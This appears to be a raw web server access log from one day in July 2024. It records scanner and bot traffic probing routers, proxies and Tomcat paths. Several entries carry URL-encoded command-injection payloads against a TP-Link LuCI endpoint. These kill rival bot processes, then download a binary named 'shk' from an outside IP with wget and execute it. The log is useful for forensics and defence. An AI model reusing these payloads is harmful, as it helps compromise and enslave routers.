79.137.194.145 - - [08/Jul/2024:00:14:15 +0200] "CONNECT www.google.com:443 HTTP/1.1" 400 804 177.185.117.136 - - [08/Jul/2024:00:25:58 +0200] "GET /geoserver/web/ HTTP/1.1" 404 740 147.185.132.61 - - [08/Jul/2024:00:26:14 +0200] "GET / HTTP/1.1" 200 1895 45.148.10.174 - - [08/Jul/2024:00:32:37 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60for+proc_dir+in+%2Fproc%2F%5B0-9%5D%2A%3B+do+pid%3D%24%7Bproc_dir%23%23%2A%2F%7D%3B+buffer%3D%24%28cat+%22%2Fproc%2F%24pid%2Fmaps%22%29%3B+if+%5B+%22%24%7B%23buffer%7D%22+-gt+1+%5D%3B+then+if+%5B+%22%24%7Bbuffer%23%2A%22%2Flib%2F%22%7D%22+%3D+%22%24buffer%22+%5D+%26%26+%5B+%22%24%7Bbuffer%23%2A%22telnetdbot%22%7D%22+%3D+%22%24buffer%22+%5D%3B+then+kill+-9+%22%24pid%22%3B+fi%3B+fi%3B+done%60) HTTP/1.1" 404 756 45.148.10.174 - - [08/Jul/2024:00:32:37 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F45.95.169.11%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) HTTP/1.1" 404 756 68.183.201.141 - - [08/Jul/2024:00:44:25 +0200] "-" 400 1930 68.183.201.141 - - [08/Jul/2024:00:44:25 +0200] "-" 400 1930 68.183.201.141 - - [08/Jul/2024:00:44:25 +0200] "GET / HTTP/1.1" 200 1895 68.183.201.141 - - [08/Jul/2024:00:44:25 +0200] "GET /download/powershell/ HTTP/1.1" 404 746 45.89.245.57 - - [08/Jul/2024:01:06:34 +0200] "GET / HTTP/1.1" 200 1895 20.43.231.11 - - [08/Jul/2024:01:06:58 +0200] "-" 400 1930 74.48.134.172 - - [08/Jul/2024:01:32:39 +0200] "POST /goform/set_LimitClient_cfg HTTP/1.1" 400 771 87.121.69.27 - - [08/Jul/2024:01:38:11 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 152.42.136.45 - - [08/Jul/2024:01:44:32 +0200] "GET / HTTP/1.1" 200 1895 207.167.66.182 - - [08/Jul/2024:02:07:18 +0200] "CONNECT www.baidu.com:443 HTTP/1.1" 400 804 44.220.185.198 - - [08/Jul/2024:02:41:39 +0200] "GET / HTTP/1.1" 200 1895 206.168.32.96 - - [08/Jul/2024:02:47:03 +0200] "GET / HTTP/1.1" 200 1895 206.168.32.96 - - [08/Jul/2024:02:47:06 +0200] "GET / HTTP/1.1" 200 1895 206.168.32.96 - - [08/Jul/2024:02:47:06 +0200] "GET /favicon.ico HTTP/1.1" 404 729 167.94.138.124 - - [08/Jul/2024:02:49:39 +0200] "GET / HTTP/1.1" 200 1895 167.94.138.124 - - [08/Jul/2024:02:49:42 +0200] "GET / HTTP/1.1" 200 1895 167.94.138.124 - - [08/Jul/2024:02:49:43 +0200] "GET /favicon.ico HTTP/1.1" 404 729 45.148.10.174 - - [08/Jul/2024:02:58:02 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60for+proc_dir+in+%2Fproc%2F%5B0-9%5D%2A%3B+do+pid%3D%24%7Bproc_dir%23%23%2A%2F%7D%3B+buffer%3D%24%28cat+%22%2Fproc%2F%24pid%2Fmaps%22%29%3B+if+%5B+%22%24%7B%23buffer%7D%22+-gt+1+%5D%3B+then+if+%5B+%22%24%7Bbuffer%23%2A%22%2Flib%2F%22%7D%22+%3D+%22%24buffer%22+%5D+%26%26+%5B+%22%24%7Bbuffer%23%2A%22telnetdbot%22%7D%22+%3D+%22%24buffer%22+%5D%3B+then+kill+-9+%22%24pid%22%3B+fi%3B+fi%3B+done%60) HTTP/1.1" 404 756 45.148.10.174 - - [08/Jul/2024:02:58:02 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F45.95.169.11%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) HTTP/1.1" 404 756 64.62.156.103 - - [08/Jul/2024:03:13:34 +0200] "GET / HTTP/1.1" 200 1895 64.62.156.97 - - [08/Jul/2024:03:14:03 +0200] "GET /favicon.ico HTTP/1.1" 404 729 64.62.156.102 - - [08/Jul/2024:03:14:13 +0200] "GET /?format=json HTTP/1.1" 200 1895 64.62.156.106 - - [08/Jul/2024:03:14:25 +0200] "CONNECT www.shadowserver.org:443 HTTP/1.1" 400 804 45.88.91.41 - - [08/Jul/2024:03:39:05 +0200] "CONNECT 185.65.245.140:7227 HTTP/1.1" 400 804 174.138.2.203 - - [08/Jul/2024:03:40:23 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [08/Jul/2024:03:40:23 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [08/Jul/2024:03:40:23 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [08/Jul/2024:03:40:23 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [08/Jul/2024:03:40:23 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [08/Jul/2024:03:40:23 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [08/Jul/2024:03:40:23 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [08/Jul/2024:03:40:23 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [08/Jul/2024:03:40:23 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [08/Jul/2024:03:40:23 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [08/Jul/2024:03:50:55 +0200] "POST /dr/tomcat.jsp HTTP/1.1" 404 735 174.138.2.203 - - [08/Jul/2024:03:50:55 +0200] "POST /dr/tomcat.jsp HTTP/1.1" 404 735 174.138.2.203 - - [08/Jul/2024:03:50:55 +0200] "POST /dr/tomcat.jsp HTTP/1.1" 404 735 174.138.2.203 - - [08/Jul/2024:03:50:55 +0200] "POST /dr/tomcat.jsp HTTP/1.1" 404 735 174.138.2.203 - - [08/Jul/2024:03:50:55 +0200] "POST /dr/tomcat.jsp HTTP/1.1" 404 735 174.138.2.203 - - [08/Jul/2024:03:50:56 +0200] "POST /dr/tomcat.jsp HTTP/1.1" 404 735 174.138.2.203 - - [08/Jul/2024:03:50:56 +0200] "POST /dr/tomcat.jsp HTTP/1.1" 404 735 174.138.2.203 - - [08/Jul/2024:03:50:56 +0200] "POST /dr/tomcat.jsp HTTP/1.1" 404 735 174.138.2.203 - - [08/Jul/2024:03:50:56 +0200] "POST /dr/tomcat.jsp HTTP/1.1" 404 735 174.138.2.203 - - [08/Jul/2024:03:50:56 +0200] "POST /dr/tomcat.jsp HTTP/1.1" 404 735 171.124.161.29 - - [08/Jul/2024:03:52:09 +0200] "POST /goform/set_LimitClient_cfg HTTP/1.1" 400 771 194.59.31.99 - - [08/Jul/2024:03:55:34 +0200] "CONNECT api.ipify.org:443 HTTP/1.1" 400 804 205.210.31.38 - - [08/Jul/2024:04:14:03 +0200] "-" 400 1930 205.210.31.38 - - [08/Jul/2024:04:14:03 +0200] "-" 400 1930 207.167.66.182 - - [08/Jul/2024:04:14:28 +0200] "CONNECT www.baidu.com:443 HTTP/1.1" 400 804 94.156.10.163 - - [08/Jul/2024:04:21:11 +0200] "POST /goform/set_LimitClient_cfg HTTP/1.1" 404 748 78.108.177.51 - - [08/Jul/2024:04:36:09 +0200] "GET / HTTP/1.0" 200 1895 87.121.69.27 - - [08/Jul/2024:04:46:34 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 64.62.156.46 - - [08/Jul/2024:04:58:30 +0200] "-" 400 1930 45.148.10.174 - - [08/Jul/2024:05:17:06 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60for+proc_dir+in+%2Fproc%2F%5B0-9%5D%2A%3B+do+pid%3D%24%7Bproc_dir%23%23%2A%2F%7D%3B+buffer%3D%24%28cat+%22%2Fproc%2F%24pid%2Fmaps%22%29%3B+if+%5B+%22%24%7B%23buffer%7D%22+-gt+1+%5D%3B+then+if+%5B+%22%24%7Bbuffer%23%2A%22%2Flib%2F%22%7D%22+%3D+%22%24buffer%22+%5D+%26%26+%5B+%22%24%7Bbuffer%23%2A%22telnetdbot%22%7D%22+%3D+%22%24buffer%22+%5D%3B+then+kill+-9+%22%24pid%22%3B+fi%3B+fi%3B+done%60) HTTP/1.1" 404 756 45.148.10.174 - - [08/Jul/2024:05:17:06 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F45.95.169.11%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) HTTP/1.1" 404 756 147.185.132.33 - - [08/Jul/2024:05:34:23 +0200] "GET / HTTP/1.0" 200 1895 87.121.69.27 - - [08/Jul/2024:05:54:42 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 94.156.10.163 - - [08/Jul/2024:05:59:07 +0200] "POST /goform/set_LimitClient_cfg HTTP/1.1" 404 748 194.26.25.137 - - [08/Jul/2024:05:59:17 +0200] "GET / HTTP/1.1" 200 1895 194.59.31.99 - - [08/Jul/2024:06:00:53 +0200] "CONNECT api6.ipify.org:443 HTTP/1.1" 400 804 44.220.185.49 - - [08/Jul/2024:06:01:04 +0200] "GET / HTTP/1.1" 200 1895 141.98.83.197 - - [08/Jul/2024:06:28:44 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60for+proc_dir+in+%2Fproc%2F%5B0-9%5D%2A%3B+do+pid%3D%24%7Bproc_dir%23%23%2A%2F%7D%3B+buffer%3D%24%28cat+%22%2Fproc%2F%24pid%2Fmaps%22%29%3B+if+%5B+%22%24%7B%23buffer%7D%22+-gt+1+%5D%3B+then+if+%5B+%22%24%7Bbuffer%23%2A%22%2Flib%2F%22%7D%22+%3D+%22%24buffer%22+%5D+%26%26+%5B+%22%24%7Bbuffer%23%2A%22telnetdbot%22%7D%22+%3D+%22%24buffer%22+%5D%3B+then+kill+-9+%22%24pid%22%3B+fi%3B+fi%3B+done%60) HTTP/1.1" 404 756 141.98.83.197 - - [08/Jul/2024:06:28:44 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F45.95.169.11%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) HTTP/1.1" 404 756 185.189.182.234 - - [08/Jul/2024:06:34:31 +0200] "GET / HTTP/1.1" 400 771 85.105.198.64 - - [08/Jul/2024:06:46:29 +0200] "POST /goform/set_LimitClient_cfg HTTP/1.1" 400 771 94.156.10.163 - - [08/Jul/2024:07:32:59 +0200] "POST /goform/set_LimitClient_cfg HTTP/1.1" 404 748 87.251.75.145 - - [08/Jul/2024:07:49:54 +0200] "-" 400 1930 45.148.10.174 - - [08/Jul/2024:08:08:45 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60for+proc_dir+in+%2Fproc%2F%5B0-9%5D%2A%3B+do+pid%3D%24%7Bproc_dir%23%23%2A%2F%7D%3B+buffer%3D%24%28cat+%22%2Fproc%2F%24pid%2Fmaps%22%29%3B+if+%5B+%22%24%7B%23buffer%7D%22+-gt+1+%5D%3B+then+if+%5B+%22%24%7Bbuffer%23%2A%22%2Flib%2F%22%7D%22+%3D+%22%24buffer%22+%5D+%26%26+%5B+%22%24%7Bbuffer%23%2A%22telnetdbot%22%7D%22+%3D+%22%24buffer%22+%5D%3B+then+kill+-9+%22%24pid%22%3B+fi%3B+fi%3B+done%60) HTTP/1.1" 404 756 45.148.10.174 - - [08/Jul/2024:08:08:45 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F45.95.169.11%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) HTTP/1.1" 404 756 45.95.169.184 - - [08/Jul/2024:08:09:44 +0200] "POST /FD873AC4-CF86-4FED-84EC-4BD59C6F17A7 HTTP/1.1" 404 754 45.95.169.184 - - [08/Jul/2024:08:09:44 +0200] "-" 400 1930 46.101.13.38 - - [08/Jul/2024:09:35:20 +0200] "-" 400 1930 46.101.13.38 - - [08/Jul/2024:09:35:21 +0200] "-" 400 1930 46.101.13.38 - - [08/Jul/2024:09:35:21 +0200] "GET / HTTP/1.1" 200 1895 46.101.13.38 - - [08/Jul/2024:09:35:21 +0200] "GET /download/powershell/ HTTP/1.1" 404 746 79.137.194.145 - - [08/Jul/2024:09:39:59 +0200] "CONNECT www.google.com:443 HTTP/1.1" 400 804 174.138.2.203 - - [08/Jul/2024:09:40:20 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [08/Jul/2024:09:40:20 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [08/Jul/2024:09:40:20 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [08/Jul/2024:09:40:20 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [08/Jul/2024:09:40:20 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [08/Jul/2024:09:40:20 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [08/Jul/2024:09:40:20 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [08/Jul/2024:09:40:20 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [08/Jul/2024:09:40:20 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [08/Jul/2024:09:40:20 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [08/Jul/2024:09:50:46 +0200] "POST /dr/tomcat.jsp HTTP/1.1" 404 735 174.138.2.203 - - [08/Jul/2024:09:50:46 +0200] "POST /dr/tomcat.jsp HTTP/1.1" 404 735 174.138.2.203 - - [08/Jul/2024:09:50:46 +0200] "POST /dr/tomcat.jsp HTTP/1.1" 404 735 174.138.2.203 - - [08/Jul/2024:09:50:46 +0200] "POST /dr/tomcat.jsp HTTP/1.1" 404 735 174.138.2.203 - - [08/Jul/2024:09:50:46 +0200] "POST /dr/tomcat.jsp HTTP/1.1" 404 735 174.138.2.203 - - [08/Jul/2024:09:50:47 +0200] "POST /dr/tomcat.jsp HTTP/1.1" 404 735 174.138.2.203 - - [08/Jul/2024:09:50:47 +0200] "POST /dr/tomcat.jsp HTTP/1.1" 404 735 174.138.2.203 - - [08/Jul/2024:09:50:47 +0200] "POST /dr/tomcat.jsp HTTP/1.1" 404 735 174.138.2.203 - - [08/Jul/2024:09:50:47 +0200] "POST /dr/tomcat.jsp HTTP/1.1" 404 735 174.138.2.203 - - [08/Jul/2024:09:50:47 +0200] "POST /dr/tomcat.jsp HTTP/1.1" 404 735 141.98.83.197 - - [08/Jul/2024:10:09:53 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60for+proc_dir+in+%2Fproc%2F%5B0-9%5D%2A%3B+do+pid%3D%24%7Bproc_dir%23%23%2A%2F%7D%3B+buffer%3D%24%28cat+%22%2Fproc%2F%24pid%2Fmaps%22%29%3B+if+%5B+%22%24%7B%23buffer%7D%22+-gt+1+%5D%3B+then+if+%5B+%22%24%7Bbuffer%23%2A%22%2Flib%2F%22%7D%22+%3D+%22%24buffer%22+%5D+%26%26+%5B+%22%24%7Bbuffer%23%2A%22telnetdbot%22%7D%22+%3D+%22%24buffer%22+%5D%3B+then+kill+-9+%22%24pid%22%3B+fi%3B+fi%3B+done%60) HTTP/1.1" 404 756 141.98.83.197 - - [08/Jul/2024:10:09:53 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F45.95.169.11%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) HTTP/1.1" 404 756 172.245.131.82 - - [08/Jul/2024:10:11:23 +0200] "GET / HTTP/1.1" 200 1895 87.121.69.27 - - [08/Jul/2024:10:40:31 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 45.148.10.174 - - [08/Jul/2024:11:05:02 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60for+proc_dir+in+%2Fproc%2F%5B0-9%5D%2A%3B+do+pid%3D%24%7Bproc_dir%23%23%2A%2F%7D%3B+buffer%3D%24%28cat+%22%2Fproc%2F%24pid%2Fmaps%22%29%3B+if+%5B+%22%24%7B%23buffer%7D%22+-gt+1+%5D%3B+then+if+%5B+%22%24%7Bbuffer%23%2A%22%2Flib%2F%22%7D%22+%3D+%22%24buffer%22+%5D+%26%26+%5B+%22%24%7Bbuffer%23%2A%22telnetdbot%22%7D%22+%3D+%22%24buffer%22+%5D%3B+then+kill+-9+%22%24pid%22%3B+fi%3B+fi%3B+done%60) HTTP/1.1" 404 756 45.148.10.174 - - [08/Jul/2024:11:05:02 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F45.95.169.11%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) HTTP/1.1" 404 756 112.46.214.52 - - [08/Jul/2024:11:06:02 +0200] "GET / HTTP/1.1" 400 771 206.168.32.96 - - [08/Jul/2024:11:11:21 +0200] "GET / HTTP/1.1" 200 1895 206.168.32.96 - - [08/Jul/2024:11:11:24 +0200] "GET / HTTP/1.1" 200 1895 206.168.32.96 - - [08/Jul/2024:11:11:25 +0200] "GET /favicon.ico HTTP/1.1" 404 729 165.154.11.121 - - [08/Jul/2024:11:22:55 +0200] "-" 400 1930 165.154.11.121 - - [08/Jul/2024:11:23:06 +0200] "GET / HTTP/1.1" 200 1895 165.154.11.121 - - [08/Jul/2024:11:23:24 +0200] "GET /favicon.ico HTTP/1.1" 404 729 165.154.11.121 - - [08/Jul/2024:11:23:24 +0200] "GET /robots.txt HTTP/1.1" 404 728 165.154.11.121 - - [08/Jul/2024:11:23:24 +0200] "GET /sitemap.xml HTTP/1.1" 404 729 165.154.11.121 - - [08/Jul/2024:11:23:25 +0200] "GET /config.json HTTP/1.1" 404 729 174.138.61.44 - - [08/Jul/2024:11:41:08 +0200] "GET / HTTP/1.1" 200 1895 174.138.61.44 - - [08/Jul/2024:11:41:08 +0200] "-" 400 1930 87.246.7.54 - - [08/Jul/2024:12:02:40 +0200] "GET / HTTP/1.0" 200 1895 87.121.69.27 - - [08/Jul/2024:12:27:32 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 43.129.37.205 - - [08/Jul/2024:12:55:40 +0200] "OPTIONS / HTTP/1.0" 200 - 43.129.37.205 - - [08/Jul/2024:12:55:40 +0200] "-" 400 1930 43.129.37.205 - - [08/Jul/2024:12:55:40 +0200] "-" 400 1930 43.129.37.205 - - [08/Jul/2024:12:55:40 +0200] "GET / HTTP/1.0" 200 1895 43.129.37.205 - - [08/Jul/2024:12:55:40 +0200] "-" 400 1930 43.129.37.205 - - [08/Jul/2024:12:55:40 +0200] "-" 400 1930 43.129.37.205 - - [08/Jul/2024:12:55:40 +0200] "-" 400 1930 43.129.37.205 - - [08/Jul/2024:12:55:40 +0200] "-" 400 1930 43.129.37.205 - - [08/Jul/2024:12:55:40 +0200] "-" 400 1930 43.129.37.205 - - [08/Jul/2024:12:55:41 +0200] "-" 400 1930 68.235.52.68 - - [08/Jul/2024:13:00:35 +0200] "GET / HTTP/1.1" 200 1895 68.235.52.68 - - [08/Jul/2024:13:00:36 +0200] "GET /HNAP1/ HTTP/1.1" 404 728 157.211.232.38 - - [08/Jul/2024:13:12:51 +0200] "GET / HTTP/1.1" 200 1895 45.227.254.8 - - [08/Jul/2024:13:14:02 +0200] "-" 400 1930 141.98.83.197 - - [08/Jul/2024:13:15:20 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60for+proc_dir+in+%2Fproc%2F%5B0-9%5D%2A%3B+do+pid%3D%24%7Bproc_dir%23%23%2A%2F%7D%3B+buffer%3D%24%28cat+%22%2Fproc%2F%24pid%2Fmaps%22%29%3B+if+%5B+%22%24%7B%23buffer%7D%22+-gt+1+%5D%3B+then+if+%5B+%22%24%7Bbuffer%23%2A%22%2Flib%2F%22%7D%22+%3D+%22%24buffer%22+%5D+%26%26+%5B+%22%24%7Bbuffer%23%2A%22telnetdbot%22%7D%22+%3D+%22%24buffer%22+%5D%3B+then+kill+-9+%22%24pid%22%3B+fi%3B+fi%3B+done%60) HTTP/1.1" 404 756 141.98.83.197 - - [08/Jul/2024:13:15:20 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F45.95.169.11%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) HTTP/1.1" 404 756 45.89.245.57 - - [08/Jul/2024:13:49:58 +0200] "GET / HTTP/1.1" 200 1895 139.224.164.94 - - [08/Jul/2024:13:51:54 +0200] "POST /goform/set_LimitClient_cfg HTTP/1.1" 400 771 94.156.10.164 - - [08/Jul/2024:13:57:38 +0200] "POST /goform/set_LimitClient_cfg HTTP/1.1" 404 748 43.129.37.205 - - [08/Jul/2024:14:02:25 +0200] "-" 400 1930 43.129.37.205 - - [08/Jul/2024:14:02:27 +0200] "-" 400 1930 43.129.37.205 - - [08/Jul/2024:14:02:50 +0200] "-" 400 1930 43.129.37.205 - - [08/Jul/2024:14:03:13 +0200] "-" 400 1930 43.129.37.205 - - [08/Jul/2024:14:03:13 +0200] "-" 400 1930 43.129.37.205 - - [08/Jul/2024:14:03:13 +0200] "-" 400 1930 43.129.37.205 - - [08/Jul/2024:14:03:15 +0200] "-" 400 1930 43.129.37.205 - - [08/Jul/2024:14:03:16 +0200] "-" 400 1930 43.129.37.205 - - [08/Jul/2024:14:03:16 +0200] "-" 400 1930 43.129.37.205 - - [08/Jul/2024:14:03:26 +0200] "-" 400 1930 43.129.37.205 - - [08/Jul/2024:14:03:27 +0200] "-" 400 1930 43.129.37.205 - - [08/Jul/2024:14:03:27 +0200] "-" 400 1930 43.129.37.205 - - [08/Jul/2024:14:03:34 +0200] "-" 400 1930 43.129.37.205 - - [08/Jul/2024:14:03:36 +0200] "-" 400 1930 43.129.37.205 - - [08/Jul/2024:14:03:39 +0200] "-" 400 1930 43.129.37.205 - - [08/Jul/2024:14:03:43 +0200] "-" 400 1930 43.129.37.205 - - [08/Jul/2024:14:03:49 +0200] "-" 400 1930 43.129.37.205 - - [08/Jul/2024:14:03:52 +0200] "-" 400 1930 43.129.37.205 - - [08/Jul/2024:14:03:52 +0200] "-" 400 1930 43.129.37.205 - - [08/Jul/2024:14:03:54 +0200] "-" 400 1930 43.129.37.205 - - [08/Jul/2024:14:03:57 +0200] "-" 400 1930 43.129.37.205 - - [08/Jul/2024:14:04:04 +0200] "-" 400 1930 43.129.37.205 - - [08/Jul/2024:14:04:08 +0200] "-" 400 1930 43.129.37.205 - - [08/Jul/2024:14:04:15 +0200] "-" 400 1930 43.129.37.205 - - [08/Jul/2024:14:04:19 +0200] "-" 400 1930 43.129.37.205 - - [08/Jul/2024:14:04:23 +0200] "-" 400 1930 43.129.37.205 - - [08/Jul/2024:14:04:26 +0200] "-" 400 1930 43.129.37.205 - - [08/Jul/2024:14:04:29 +0200] "-" 400 1930 43.129.37.205 - - [08/Jul/2024:14:04:31 +0200] "-" 400 1930 43.129.37.205 - - [08/Jul/2024:14:04:34 +0200] "-" 400 1930 43.129.37.205 - - [08/Jul/2024:14:04:42 +0200] "-" 400 1930 43.129.37.205 - - [08/Jul/2024:14:04:44 +0200] "-" 400 1930 43.129.37.205 - - [08/Jul/2024:14:04:44 +0200] "-" 400 1930 43.129.37.205 - - [08/Jul/2024:14:04:48 +0200] "-" 400 1930 43.129.37.205 - - [08/Jul/2024:14:04:50 +0200] "-" 400 1930 43.129.37.205 - - [08/Jul/2024:14:05:00 +0200] "-" 400 1930 43.129.37.205 - - [08/Jul/2024:14:05:02 +0200] "-" 400 1930 43.129.37.205 - - [08/Jul/2024:14:05:15 +0200] "-" 400 1930 43.129.37.205 - - [08/Jul/2024:14:05:17 +0200] "-" 400 1930 43.129.37.205 - - [08/Jul/2024:14:05:20 +0200] "-" 400 1930 43.129.37.205 - - [08/Jul/2024:14:05:22 +0200] "-" 400 1930 43.129.37.205 - - [08/Jul/2024:14:05:22 +0200] "-" 400 1930 43.129.37.205 - - [08/Jul/2024:14:05:24 +0200] "-" 400 1930 43.129.37.205 - - [08/Jul/2024:14:05:28 +0200] "-" 400 1930 43.129.37.205 - - [08/Jul/2024:14:05:31 +0200] "-" 400 1930 43.129.37.205 - - [08/Jul/2024:14:05:31 +0200] "-" 400 1930 43.129.37.205 - - [08/Jul/2024:14:05:32 +0200] "-" 400 1930 43.129.37.205 - - [08/Jul/2024:14:05:44 +0200] "-" 400 1930 43.129.37.205 - - [08/Jul/2024:14:05:44 +0200] "-" 400 1930 43.129.37.205 - - [08/Jul/2024:14:05:46 +0200] "-" 400 1930 43.129.37.205 - - [08/Jul/2024:14:05:47 +0200] "-" 400 1930 43.129.37.205 - - [08/Jul/2024:14:05:49 +0200] "-" 400 1930 43.129.37.205 - - [08/Jul/2024:14:05:49 +0200] "-" 400 1930 43.129.37.205 - - [08/Jul/2024:14:05:55 +0200] "-" 400 1930 43.129.37.205 - - [08/Jul/2024:14:05:57 +0200] "-" 400 1930 43.129.37.205 - - [08/Jul/2024:14:06:03 +0200] "-" 400 1930 43.129.37.205 - - [08/Jul/2024:14:06:17 +0200] "-" 400 1930 43.129.37.205 - - [08/Jul/2024:14:06:24 +0200] "-" 400 1930 43.129.37.205 - - [08/Jul/2024:14:06:25 +0200] "-" 400 1930 43.129.37.205 - - [08/Jul/2024:14:06:25 +0200] "-" 400 1930 43.129.37.205 - - [08/Jul/2024:14:06:28 +0200] "-" 400 1930 43.129.37.205 - - [08/Jul/2024:14:06:30 +0200] "-" 400 1930 43.129.37.205 - - [08/Jul/2024:14:06:30 +0200] "-" 400 1930 43.129.37.205 - - [08/Jul/2024:14:06:37 +0200] "-" 400 1930 43.129.37.205 - - [08/Jul/2024:14:06:37 +0200] "-" 400 1930 43.129.37.205 - - [08/Jul/2024:14:06:39 +0200] "-" 400 1930 43.129.37.205 - - [08/Jul/2024:14:06:43 +0200] "-" 400 1930 43.129.37.205 - - [08/Jul/2024:14:06:44 +0200] "-" 400 1930 43.129.37.205 - - [08/Jul/2024:14:06:47 +0200] "-" 400 1930 43.129.37.205 - - [08/Jul/2024:14:06:49 +0200] "-" 400 1930 43.129.37.205 - - [08/Jul/2024:14:06:54 +0200] "-" 400 1930 43.129.37.205 - - [08/Jul/2024:14:06:56 +0200] "-" 400 1930 43.129.37.205 - - [08/Jul/2024:14:06:57 +0200] "-" 400 1930 43.129.37.205 - - [08/Jul/2024:14:07:00 +0200] "-" 400 1930 43.129.37.205 - - [08/Jul/2024:14:07:00 +0200] "-" 400 1930 43.129.37.205 - - [08/Jul/2024:14:07:01 +0200] "-" 400 1930 43.129.37.205 - - [08/Jul/2024:14:07:02 +0200] "-" 400 1930 43.129.37.205 - - [08/Jul/2024:14:07:02 +0200] "-" 400 1930 43.129.37.205 - - [08/Jul/2024:14:07:04 +0200] "-" 400 1930 43.129.37.205 - - [08/Jul/2024:14:07:06 +0200] "-" 400 1930 43.129.37.205 - - [08/Jul/2024:14:07:10 +0200] "-" 400 1930 43.129.37.205 - - [08/Jul/2024:14:07:13 +0200] "-" 400 1930 43.129.37.205 - - [08/Jul/2024:14:07:13 +0200] "-" 400 1930 43.129.37.205 - - [08/Jul/2024:14:07:16 +0200] "-" 400 1930 43.129.37.205 - - [08/Jul/2024:14:07:17 +0200] "-" 400 1930 43.129.37.205 - - [08/Jul/2024:14:07:19 +0200] "-" 400 1930 43.129.37.205 - - [08/Jul/2024:14:07:22 +0200] "-" 400 1930 43.129.37.205 - - [08/Jul/2024:14:07:24 +0200] "-" 400 1930 43.129.37.205 - - [08/Jul/2024:14:07:24 +0200] "-" 400 1930 43.129.37.205 - - [08/Jul/2024:14:07:27 +0200] "-" 400 1930 43.129.37.205 - - [08/Jul/2024:14:07:29 +0200] "-" 400 1930 43.129.37.205 - - [08/Jul/2024:14:07:29 +0200] "-" 400 1930 43.129.37.205 - - [08/Jul/2024:14:07:32 +0200] "-" 400 1930 43.129.37.205 - - [08/Jul/2024:14:07:33 +0200] "-" 400 1930 43.129.37.205 - - [08/Jul/2024:14:07:35 +0200] "-" 400 1930 43.129.37.205 - - [08/Jul/2024:14:07:36 +0200] "-" 400 1930 43.129.37.205 - - [08/Jul/2024:14:07:37 +0200] "-" 400 1930 43.129.37.205 - - [08/Jul/2024:14:07:38 +0200] "-" 400 1930 43.129.37.205 - - [08/Jul/2024:14:07:41 +0200] "-" 400 1930 